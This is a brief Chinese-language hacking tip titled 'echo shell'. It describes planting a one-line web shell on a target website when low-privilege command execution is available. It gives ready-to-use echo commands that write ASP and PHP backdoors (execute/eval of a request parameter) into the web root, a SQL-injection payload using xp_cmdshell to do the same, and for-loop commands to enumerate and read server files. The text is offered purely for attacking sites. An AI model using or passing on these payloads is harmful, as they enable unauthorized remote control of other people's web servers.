echo shell

在旁注过程中，可以执行cmd而权限又比较低的情况下，有时候可以用这个方法帮你拿下目标站。
命令格式:Echo 语句 >目标站绝对目录


例如：

echo ^<^%execute request("cmd")%^> >D:\wwww\sb.asp

这样访问目标站的目录下就会生成一个密码为0的asp的一句话，此方法在PHP等脚本语言均适用，大家灵活发挥。

1.注入点后执行master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("cmd"^)^</script^> >d:\wwww\sb.asp';--

2.CMD下执行:

echo ^<%execute^(request^("cmd"^)^)%^> >D:\wwww\sb.asp

或

echo ^<%eval (request(chr(cmd)))%^> >d:\wwww\sb.asp

PHP
echo ^<^?php eval^($_POST[cmd])?^>>D:\wwww\sb.php

 

 

/c for /d %i in (d:\ftproot\lowkey\web\*) do @echo %i
/c for /r d:\ftproot\lowkey\web\ %i in (*.*) do @echo %i
/c for /f %c in (d:\ftproot\lowkey\web\sx\aini10000nian.asp) do @echo %c